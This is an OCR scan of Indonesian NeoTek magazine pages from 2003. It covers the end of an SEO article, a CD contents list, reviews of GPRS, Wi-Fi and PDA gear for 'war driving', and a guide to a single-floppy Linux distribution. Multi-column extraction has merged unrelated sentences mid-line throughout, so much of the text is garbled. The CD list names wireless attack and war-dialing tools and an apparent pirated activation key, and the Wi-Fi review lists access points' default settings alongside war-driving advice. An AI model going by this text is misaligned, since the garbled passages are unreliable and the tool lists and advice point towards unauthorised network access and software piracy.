<meta name="robots" content="noindex, noarchive, follow" /> the extent of doing reverse lookups.
Hack #32 Google News
Penutup Reading the latest news across myriad sources
Segala usaha kita dalam menambahkan atau pun memper- using Google News.
baiki meta tag yang sudah ada baru efektif setelah kita men- Hack #44 Scraping Google Results
daftarkan situs kita pada search engine ( misal, pada Google: Scraping the results of a Google search into a
http://www.google.com/addurl.html ) atau setelah masa comma-delimited file.
kunjungan spider berikutnya.
Hack #54 NoXML, Another SOAP::Lite Alternative
Bahwa meta tag bukan menjadi satu-satunya faktor untuk NoXML is a regular expressions-based, XML
menentukan ranking sebuah situs, telah kita maklumi, karena Parser-free drop-in alternative to SOAP::Lite
meta tag sebenarnya ditujukan untuk meningkatkan akses-
ibilitas dan usabilitas sebuah situs dengan menyajikan infor- Hack #79 Measuring Google Mindshare
masi yang akurat mengenai isi sebuah situs kepada search Measure the Google mindshare of a particular
engine. person within a query domain.
Andrew Goodman, editor pada Traffick.com, boleh membuat Hack #87 Google Whacking
kita heboh dengan menyatakan "berakhir"-nya meta tag With over 2 billion pages in its index, is it
(baca ,"An End to Metatags",www.traffick.com/article.asp?aID=102 ); possible to get only one result for a search?
namun perlu dipertanyakan sekali lagi, meta tag yang bagai- Hack #100 Removing Your Materials from Google
mana yang dianggapnya berakhir atau "mati" (meminjam How to remove your content from Google's
istilah Danny Sullivan, editor Searchenginewatch.com)? various web properties.
Dengan uraian di atas, Anda dapat menjawabnya sendiri.
Juneman Abraham adalah pengajar pada
http://www.webmastercertification.web.id/ dan dapat Google Hacks
dihubungi lewat email di neumanmail@yahoo.com By Tara Calishain, Rael Dornfest
February 2003
Series: Hacks
0-596-00447-8, Order Number: 4478
352 pages, $24.95 US, $38.95 CA, £17.50 UK

Mei/Jun 2003 NeoTek 43


NeoRagam

eBook ini adalah lanjutan dari


eBook sebelumnya yang dise-
daftar isi
diakan pada CD NeoTek III/5
Feb?Mar 2003.
cd neotek
Advanced Linux Pocketbook
2003 memulai bahasan dengan E-BOOK
instalasi Linux Debian yang Advanced Linux Pocketbook 2003
dilanjutkan dengan cara mena- ALPB2003.pdf
ngani hardware, pembahasan
networking pada Linux, dan Hackproofing Your Web Application
security practice pada Linux. ebook.htm
Dua tiga bab terakhir lebih
merupakan penutup: Maxi- WIRELESS HACKING
mizing Linux, Developing AirJack 0.6.2 airjack-v0.6.2-alpha.tar.gz
Linux, dan Helping the Cause. AiroPeek Demo apwdemo.exe
AiroPeek NX Demo apwnxdemo.exe
Ingin menangani Linux AirSnort Airsnort-0.2.1a.tar.gz
dengan benar? Pakai distro ARP Poisoning arppoison.zip
Debian dan baca eBook ini. CENiffer ARM Processor CEnifferARM.zip
CENiffer MIPS Processor CEnifferMIPS.zip
Advanced Linux Pocketbook 2003 CENiffer SH3 Processor
Fake AP
CEnifferSH3.zip
fakeap-0.3.1.tar.gz
Kismet kismet-2.8.1.tar.gz
AMKM MiniStumbler MiniStumbler_0_3_23.zip
Adnan Zain Network Stumbler Win NetStumblerInstaller_0_3_30.exe
MuLinux mulinux-13r2.zip vx FTP vxFtp.zip
Andrew B vx FTP Server vxFtpSrv.zip
ASP to PHP Linux asp2php-0.75.17.tar.gz vx HPC vxHpc.zip
ASP to PHP Windows jaguarAsp2Php0.2.7.sea.zip vx IP Config vxIPConfig.zip
ASP to PHP Mac jaguarAsp2Php0.2.7.sea.sit vx Sniffer vxSniffer.zip
PHP Nuke 6 PHP-Nuke-6.0.tar.gz vx TFTP Server vxTftpSrv.zip
Wdasm 32 wdasm893.zip vx Utilities vxUtil.zip
Dreamweaver Extension (24 groups) vx Web vxWeb.zip
Firnand WAR DIALER
Remote Scope Demo RemoteScopeConsoleDemo.exe Blue Beep bluebeep.zip
Rheesal Hendra Blue Dial bdial62.zip
Championship Manager 1 setup.exe PBX Scanner pbx_scan.zip
Championship Manager 93-94 setup9394.exe Phone Tag phonetag.zip
Championship Manager Italia setupcmitalia.exe Switch Board switch.zip
CM 1 Data Editor cm1preed.zip Telix for DOS telix351.zip
Championship Manager 2 (24 files) Telix for Windows setup.exe
Waja THC-Scan thc-ts20.zip
FineCrypt 7.1 fcinst.exe ToneLoc tl110.zip
Picture Man 4.2 Trial picman42.zip ToneLoc Utilities toneutil.zip
Wiji GAME
Read please 2003 setupreadplease2003.exe Mutant Storm mutantstorm_demo.exe
Yossy Jurassic Park (Demo) jpgenesis_demo.exe
AVSim+80 Demo avs80.exe Roller Coaster Tycoon 2 RCT2Demo.zip
WINDOWS SECURITY
MBSA mbsasetup.exe
Poledit for Windows 95 poledit95.zip
Poledit for Windows 98 poledit98.zip
Windows Installer 2.0 (NT) InstMSiW.exe
REGISTRY TOOL (FULL VERSION)
RegCrawler 3.0 rc30.zip
RegHealer 2.32 rhset_apc.exe
Tweak XP 2.17 tweakxp_apc.exe
DELPHI WORKSHOP
Delphi 7 Personal Edition Install.exe
Delphi 7 Activation Key reg119.txt
Tweakid Project PTweakid.dpr
NOKIA UTILITIES
PC Suite for Nokia 6510 Nokia_PC_Suite_4.51a.exe
Modem Setup 6510 Modem_Setup_for_Nokia_6510.exe
PC Suite for Nokia 7250 Nokia_PC_Suite_51_en.exe
Modem Driver 7250 Cable Nokia_7250_Cable-driver
Modem Driver 7250 IrDA1 Nokia_7250_IrDA_2000_XP
Modem Driver 7250 IrDA2 Nokia_7250_IrDA_95SE_ME
LINUX DISTRO
Proteksi terbaik untuk sistem komputer anda dari serangan Xnuxer Linux xnuxer-linux.zip
virus. Dapatkan Harga spesial hanya dari 17$. PROJECT/WORKSHOP
Hubung Budi Kurniawan srv32, srv32d, exedll readme.txt
email:kurniawan-budi@centrin.net.id, Hp: 08129512648 MySecure HTM MySecure.htm

44 NeoTek Mei/Jun 2003


NeoReview

STREET WARRIOR GADGET

Kapan Saja, Dimana Saja


Selalu On-Line Lewat Wireless Connection
Ada beberapa opsi wireless. Untuk handphone dikenal sebagai GPRS dan (kelak) 3G,
sedangkan untuk komputer dan PDA dikenal sebagai Wi-Fi. Kita mulai bahasan kita dengan
handphone GPRS yang kini sedang marak-maraknya serta pemanfaatannya bersama PC.

Go Wireless dengan G P R S/Laptop


Nokia 6510
AHWA MANUSIA ADA- mengirim atau menerima Berikut adalah contoh tampil-
B lah makhluk sosial
terlihat dari besar-
data pada network berbasis
protokol internet. Aplikasi
an PC Suite untuk Nokia 6510
yang mencakup fasilitas:
salah sati
handphone
Nokia yang
nya minat terhadap alat un- yang dapat memanfaatkan GPRS
• Nokia Content Copier enabled dan
tuk berkomunikasi. Pada pe- GPRS adalah WAP, MMS, • Nokia PC Composer mendukung
ringkat pertama adalah te- SMS, Java, dan PC Dial-up • Nokia PC Graphics sinkronisasi.
lepon seluler yang jelas besar (misalnya Internet brows • Nokia PC Sync
manfaatnya serta terjangkau ÿÿÿing dan e-mail). • Nokia PC Wap Manager
harganya. Apalagi dengan Telepon genggam GPRS kini • Nokia Phone Editor.
semakin banyaknya hand- bukanlah barang aneh lagi.
phone second hand serta Nokia PC Suite yang berbe-
Khusus untuk Nokia di anta- da tersedia untuk masing-
paket kartu GSM prabayar. ranya adalah model: 3510, masing GPRS phone pada
Pada tingkat dasar ini salah 3510i, 3650, 5100, 6100, 6310, daftar di atas kecuali tipe
satu daya tarik terbesar GSM 6310i, 6510, 6610, 6800, 7210, 3510 dan 3510i yang tidak
adalah kemampuan mengi- 7250, 7650, 8310, 8910, 8910i. mendukung sinkronisasi.
rim dan menerima SMS Adanya fasilitas GPRS mem-
(short messages system). Selain dapat melakukan sin-
buat telepon genggam yang kronisasi dengan PC, dapat
Sedikit meningkat adalah bersangkutan dapat meman- juga dijadikan modem un-
fasilitas GPRS (G GSM Packet faatkan semua fasilitas yang tuk PC/laptop tersebut.
Radio Service) yaitu perlu- terdapat pada Nokia PC Suite,
asan dari GSM yang me- khususnya feature sinkroni- Perangkat minimal seorang
mungkinkan pelanggan me- sasi calendar, address book, to- street warrior dengan demi-
manfaatkan transmisi data do-list, dan email dari Out- kian adalah laptop dan salah
kecepatan tinggi. look, Outlook Express, Lotus satu tipe handphone GPRS
Notes, atau email client lain- di atas (kecuali tipe 3510
Teknologi GPRS memung- dan 3510i).
kinkan handphone diguna- nya. Selaitu itu, handphone
kan sebagai piranti untuk GPRS juga dapat dijadikan
modem untuk laptop.

Setelah di-install, Nokia PC Suite terdapat pada Start Menu. Pada suite ini terdapat berbagai fungsi dengan
fungsi Synchronization dan WAP Manager yang paling relevan dengan fungsi wireless.

Mei/Jun 2003 NeoTek 45


NeoReview

Go Wireless dengan Wi-Fi/Laptop


Yang dimaksud dengan Wi-Fi (wireless fidelity) adalah spesifikasi
802.11a dan 802.11b yang memenuhi syarat
Wireless Ethernet Compatibility Alliance (WECA)
yang artinya perangkat anda dapat berkomunikasi dengan produk wireless
LAN lain yang IEEE 802.11 compliant. Dalam bahasa mudahnya,
perangkat wireless anda kompatibel dengan yang lain. SGD188

ERNYATA URUSAN SMC, Senao, Planet, dan la- ANTENA EKSTERNAL


T kompatibel untuk
wireless NIC pada
innya memang lebih murah
(hampir separuh harga merk-
nal yang lazim digunakan Signull SMISMCY12
dalam wireless network: om- (USD155)
dasarnya tidak menjadi ma- merk utama di atas), tetapi nidirectional dan directional. www.signull.com
salah sejauh anda menggu- rata-rata tidak dikenali oleh
nakan WNIC itu untuk: NetStumbler. Antena omnidirectional Circular yagi antenna
menghasilkan pancaran ke dengan kinerja yang baik.
• berasosiasi (terhubung) Yang menjadi masalah di segala arah, sedangkan an-
dengan access point. Indonesia adalah belum ba- tena directional hanya ke ACCESS POINT
• membentuk ad-hoc nyaknya hot spot atau titik- satu arah saja. Bayangkan
titik access point untuk Ada banyak sekali pabrikan
network dengan komputer seperti membandingkan access point dan semuanya
lain tanpa menyertakan umum di Indonesia. Mung- lampu pijar dengan senter..
kin untuk koridor perkantor- menyajikan fungsi yang
access point Beberapa jenis antena di sama. Perbedaan utamanya
Namun urusannya menjadi an Thamrin-Sudirman agak
berbeda. bawah ini dapat dipertim- adalah dalam hal security.
berbeda apabila anda hendak bangkan sebagai antena
menggunakan WNIC anda Di Singapore dengan tingkat Linksys kini sangat populer
eksternal: mengingat harganya yang
untuk war driving. Software pemakaian broadband yang
tinggi, pemakaian access point HyperLink HG2415Y ekonomis, mudah didapat
war driving utama, yaitu
NetStumbler hanya yang populer, serta kepadat- (USD105) serta serta adanya fungsi
mendukung beberapa jenis an penduduk (sebagian besar www.hyperlinktech.com security yang cukup baik,
WNIC saja, khususnya yang tinggal di apartemen), amat yaitu MAC restriction dan
secara ketat Wi-Fi compliant. mudah menbdapatkan hot beacon turn-off capability.
spot. Bahkan hanya dengan Linksys WAP11 (SGD199)
Untuk war driving, WNIC menggunakan WNIC saja, www.linksys.com
card yang pasti bisa diguna- tanpa ditambah dengan an-
kan (dan relatif mudah dida- default SSID Linksys
tena eksternal. HG2415Y
pat di pasaran) adalah: default IP 192.168.1.250
Di Indonesia pada umumnya default chan. 6
• ORiNOCO Silver/Gold penerapan wireless LAN pa- Antena yagi (directional) Encryption 40/128-bit
• Avaya Silver/Gold da umumnya selalu me- dengan kinerja yang kuat. Clients 32
Silver artinya menggunakan nyertakan antena eksternal. Signull SMISMCO10 NetGear ME102 (SGD199)
enkripsi WEP 64-bit, sedang- Bahkan antena eksternal se- (USD120) www.netgear.com
kan Gold menggunakan en- lalu menjadi bahasan penting www.signull.com default SSID Wireless
kripsi WEP 128-bit. sejak awal pembahasan wire- Omnidi- default IP 192.168.0.5
less LAN (perhatikan artikel- rectional default chan. 6
WNIC merk lain yang artikel Onno W. Purbo) yang
didukung oleh NetStumbler antenna Encryption 40/128-bit
sangat menekankan pen- yang di- Clients 32
di antaranya: tingnya pemakaian antena rancang SMC 2655W (SGD199)
• Dell TrueMobile 1150 eksternal. untuk www.smc.com
• Toshiba 802.11b wireless Antena eksternal untuk wire- longrange
default SSID MiniAP
card less NIC bukanlah benda multipoint
applica- default IP 192.168.2.50
• Compaq WL110 yang terlalu aneh juga. Apa- default chan. 1
bila memahami prinsip-prin- tion.
• Cabletron Roamabout sip antena, maka antena eks-
Encryption 40/128-bit
• ELSA AirLancer Clients 32
ternal WNIC dapat dibuat
• ARtem ComCard sendiri, seperti yang dilaku-
• 1stWave 1ST-PC-DSS11 kan oleh Judhi Prasetyo
dengan antena kalengnya.
• Buffalo Airstation WLI-
PCM-L11 Pada WNIC ORiNOCO atau
Avaya, sudah terdapat ko-
Wireless NIC lain yang po- nektor untuk dihubungkan
puler di pasaran seperti dari dengan antena eksternal.
LinkSys, D-Link, Netgear,
Ada dua jenis antena ekster- SMISMCO10 SMISMCY12

46 NeoTek Mei/Jun 2003


NeoReview

Go Wireless dengan Pocket PC


Untuk wireless communication handheld device yang mendominasi adalah Pocket PC dengan
sistem operasi Microsoft Pocket PC 2002 dengan product leader-nya Compaq iPAQ.
Tapi kini iPAQ mulai disaingi oleh merk-merk lain seperti Fujitsu, Toshiba, dan Dell.
NeoTek memilih dua wireless PDA yang patut dipertimbangkan:
Compaq iPAQ 5450 dan Toshiba Pocket PC e740.

AHWA IPAQ ADALAH STANDAR


B de facto untuk wireless PDA
terlihat dari berbagai soft-
ware wireless yang selalu menyedia-
kan versi untuk iPAQ seperti misal-
nya, induk segala war driving soft-
ware, NetStumbler, yang juga me-
nyediakan versi untuk iPAQ, yaitu
MiniStumbler.
Untuk menjalankan wireless net-
working pada PDA, maka pada PDA
harus terpasang wireless network
interface card (WNIC) yang biasanya
lewat CF Type II slot atau pada dua
model yang dibahas ini sudah ter- FITUR FUJITSU LOOX 600 HP IPAQ H5450 DELL AXIM X5 TOSHIBA E740
integrasi di dalamnya.
Sistem operasi MS Pocket PC 2002 MS Pocket PC 2002 MS PocketPC 2002 MS PocketPC 2002
Sebenarnya untuk war driving selain Prosesor XScale 400 MHz XScale 400 MHz XScale 400 MHz XScale 400 MHz
menggunakan NetStumber (Windows) Dimensi 130 x 77 x 17.5 mm 138 x 84 x 15.9 mm 128 x 81.5 x 18 mm 125 x 80 x 16 mm
atau MiniStumbler (Pocket PC) dapat Berat 175 g 206 g 196 g 285 g
juga menggunakan Kismet yang ber- Layar TFT LCD TFT LCD TFT LCD TFT LCD
jalan pada mesin Linux (baik yang Resolusi 240 x 320 pixel 240 x 320 pixel 240 x 320 pixel 240 x 320 pixel
desktop maupun Linux PDA seperti Jumlah warna 65.536 (16 bit) 65.536 (16 bit) 65.536 (16 bit) 65.536 (16 bit)
Sharp Zaurus). Touch screen ya ya ya ya
Memang penggunaan Kismet tidak RAM 64 MB 64 MB 64 MB 64 MB
semudah NetStumbler atau Mini ROM 32 MB 48 MB 48 MB 32 MB
Stumbler, khususnya untuk anda Metode input handwriting, soft handwriting, soft handwriting, soft handwriting, soft
yang belum terbiasa dengan Linux. keyboard, voice keyboard, voice keyboard, voice keyboard, voice
Komunikasi IrDA, USB IrDA, USB IrDA, USB IrDA, USB
integrated bluetooth integrated bluetooth bluetooth (via CF) bluetooth (via SD card)
integrated Wi-Fi Wi-Fi (via CF) integrated Wi-Fi
Expansion slot CF Type II, SD/MMC SD, Output exp. CF Type II, SD card CF Type II, SD/MMC
Included devices Docking cradle, Docking cradle, Docking cradle, Docking cradle,
stylus, DC adapter stylus, DC adapter stylus, DC adapter stylus, DC adapter
Sound speaker, mic, jack speaker, mic. jack speaker, mic, jack speaker, mic, jack
voice rec., aud. out voice rec. aud. out voice rec., aud. out voice rec., aud. out
Baterai 1400mAh Lith.pol. Lith. ion 1440mAh Lith-ion Lith. ion
Fitur khusus — biometrics, enkripsi Wi-Fi optional Expansionpack:
VGA output, USB port
for keyboard
1 Harga SGD 959 SGD 1199 Mulai dari SGD 419 SGD 888

Kismet berjalan pada


Sharp Zaurus 5500
(Gambar 1 dan 2)
serta MiniStumber
berjalan pada
iPAQ PocketPC
(Gambar 3 dan 4)

2 3

Mei/Jun 2003 NeoTek 47


NeoReview

XN U X E R LI N U X
Distro Linux Satu Disket
Dani Firmansyah (xnuxer@yahoo.com) melangkah lebih jauh dalam dunia Teknologi Informasi.
Bukan sekedar menjadi pemakai, kini sudah bisa menjadi packager dengan membuat distro-nya
sendiri Xnuxer Linux. Apa kelebihan dan keterbatasannya?

asa penasaran dan ingin tahu! Setidaknya itulah • Support untuk seluruh jenis prosesor 386, 486, 586, dan 686
R yang mendorong penulis untuk membuat distro
Linux yang dapat dikemas dalam satu buah disket


Support modules, PCI architecture, dan mouse
Support IDE device (floppy disk, hard disk, CD)
berukuran 1,44 MB. Keingintahuan untuk bisa membuat • Support RAM drive
minidistro Linux ini semakin kuat ketika penulis membaca
beberapa site project minidistro seperti Small linux, LRP • Support network dengan konfigurasi minimal
(Linux Router Project) dengan kemampuan sebagai router, • Support protocol socket TCP, UDP, ICMP
dan Mulinux yang mampu menjalankan X-Windows dari • Support untuk beberapa jenis file system
disket dengan memanfaatkan RAM disk. (FAT/FAT32,NTFS,EXT2)
Distro Xnuxer Linux ini dikerjakan selama lima hari di saat- • Support LAN card/Ethernet base 10/100 dan 3Com
saat waktu senggang penulis. Tidak ada yang istimewa pada Di kernel yang penulis buat memang tidak disertakan du-
distro ini kecuali ukurannya yang kecil karena bisa dikemas kungan terhadap hardware SCSI yang notabene banyak di
di dalam disket serta dukungan aplikasi network umum pakai pada PC model lama. Ini dengan pertimbangan agar
yang disertakan dalam distro. ukuran kernel tidak lebih besar dari ukuran maksimal yang
Tujuan dibuatnya distro Xnuxer Linux adalah untuk lebih telah di tentukan. Penggunaan RAM drive menjadi sangat
memperkenalkan operating system linux kepada para peng- penting untuk memaksimalkan kerja kernel dan disini penu-
gemar komputer pada umumnya dan kepada penggemar lis telah mengkonfigurasi kernel agar membuat RAM disk
Linux/nix pada khususnya. sebesar 4 MB.
Dari pengamatan penulis, sebenarnya sebenarnya yang ter- Instalasi Xnuxer Linux ke Disket
tarik dengan operating system Linux dan kebanyakan me-
reka merasa terhambat, karena untuk kategori pemula dan Di dalam paket instalasi Xnuxer Linux setidaknya ada bebe-
baru mengenal Linux, masih dirasa sulit untuk melakukan rapa file di dalamnya yaitu rawritewin.exe, xnuxer.img, dan
proses instalasi Linux apalagi ketika harus membagi partisi file README.txt yang seluruhnya berukuran sekitar 1,6 Mb.
di hard disk. Distro disket sangat cocok untuk para pemula
yang ingin belajar perintah-perintah di Linux tanpa perlu
terlibat dengan proses instalasi yang rumit.
Ada beberapa kendala yang penulis hadapi ketika membuat
distro Xnuxer Linux. Yang pertama tentunya penulis harus
memperhitungkan agar ukuran distro yang dibuat tidak me-
lebihi 1440 Kb yang artinya perlu dilakukan konfigurasi
kernel yang seminimal mungkin. Kendala yang kedua adalah
Penulis harus menentukan beberapa dukungan file system
yang seminimal mungkin juga agar ukurannya tidak mele-
bihi batas ukuran disket.
Dari hasil percobaan dengan menggunakan Trustix Secure Untuk Pemakai Windows
Linux dengan kernel 2.2-19, penulis melakukan konfigurasi
kernel hampir kurang lebih 10 kali untuk mendapatkan ukur- Untuk Anda pemakai Windows, Anda bisa menginstalasi
an kernel sesuai dengan yang diinginkan. Xnuxer Linux ke disket menggunakan rawritewin.exe de-
ngan langkah-langkah sbb:
Idealnya untuk minidistro yang dikemas dalam disket, ukuran
kernel adalah di bawah 400 Kb, tapi dari awal penulis bertekad 1. Jalankan rawritewin.exe di Windows Anda.
bahwa walaupun distro dibuat dalam disket, kinerja tetap 2. Pilih image linux dengan menekan tombol browse dan
dipertimbangkan dan merupakan keinginan penulis untuk pilih image dengan nama file xnuxer.img
melengkapi distro Xnuxer Linux dengan kemampuan jaringan/ 3. Tekan tombol write di rawritewin.exe dan tunggu hingga
network yaitu dengan melengkapi distro dengan beberapa proses selesai.
dukungan protokol socket seperti UDP, TCP, dan ICMP meski
dengan konfigurasi minimal. 4. Reboot PC Anda dan atur agar BIOS booting dari drive A:
Dari hasil akhir kompilasi kernel yang penulis lakukan diper- 5. Selanjutnya tunggu proses booting selesai dan prompt
oleh kernel dengan ukuran 498 Kb. Ukuran kernel ini sudah login muncul.
dilengkapi beberapa dukungan hardware dan beberapa format 6. Gunakan login 'rroot' atau 'xxnuxer' untuk masuk ke
file system di antaranya: dalam sistem.

48 NeoTek Mei/Jun 2003


NeoReview

Untuk Pemakai Linux


Bagi Anda yang akan menginstalasi Xnuxer Linux dari ope-
rating sistem Linux Anda gunakan program dd (progam copy
dan convert file, default di Linux) seperti contoh berikut ini:
1. Gunakan program DD (copy and convert file) dengan
menjalankan perintah sbb:
dd if=xnuxer.img of=/dev/fd0 bs=1k seek=0
2. Tunggu hingga proses duplikasi image selesai.
3. Reboot PC Anda dan atur agar bios booting dari drive A:
4. Selanjutnya tunggu proses booting selesai dan prompt
login muncul.
5. Gunakan login 'root' atau 'xnuxer' untuk masuk ke
dalam sistem.

File System, Mouse, dan Network


Dalam penyiapan kernal yang juga perlu diperhatikan adalah
mengatur dukungan file system dan beberapa file konfigurasi.
Sebagian besar file system diletakkan di direktori /bin dan
/sbin, tentu hal ini membuat penulis sedikit mengerenyitkan
dahi karena harus memikirkan bagaimana agar image file
system yang dibuat tidak terlalu besar. Akhirnya jalan yang
ditempuh adalah melengkapi file system berformat AOUT
binary format yang ukurannya lebih kecil dibandingkan
dengan file sistem berformat ELF binary format. Dukungan
mouse juga disertakan di distro ini; setidaknya ada tiga jenis
mouse yang di-support oleh kernel yaitu:
1. Logitech Mouse
2. Microsoft Mouse
3. PS/2 Mouse
Untuk uji coba mouse, Anda yang menggunakan serial
mouse bisa menjalankan command sebagai berikut ketika
sudah login di Xnuxer Linux.
/usr/bin/gpm -t bare
Untuk Anda yang menggunakan mouse jenis PS/2 silahkan
jalankan command berikut dari prompt Xnuxer Linux:
gpm -k > /dev/null
gpm -m /dev/psaux -t ps2 -r 30 > /dev/null
Setelah command di atas mudah-mudahan mouse Anda
sudah bisa digunakan.
Di distro ini penulis memang tidak menyertakan beberapa
modul network card dengan pertimbangan agar ukuran
image file system tidak terlalu besar. Tapi jangan khawatir,
kernel yang penulis buat mendukung load module dan net-
work card untuk jenis 3Com dan Ethernet Card base 10/100.
Mungkin pada versi yang akan datang penulis akan menyer-
takan dukungan modul network card seperti untuk Realtek
8193 dan NE2000 yang banyak di gunakan oleh network card
saat ini. Tapi untuk sekedar latihan Anda bisa mencoba bebe-
rapa perintah Linux yang sering digunakan di jaringan/network
seperti: ping, route, ifconfig dan sebagainya. Coba lakukan
perintah ping ke localhost seperti contoh berikut:
ping localhost
atau
ping 127.0.0.1
Mudah-mudahan proses duplikasi distro disket Xnuxer Linux
tidak terlalu sulit dan silahkan bermain-main dengan bebe-
rapa perintah-perintah Linux.
Semoga membantu.

You might also like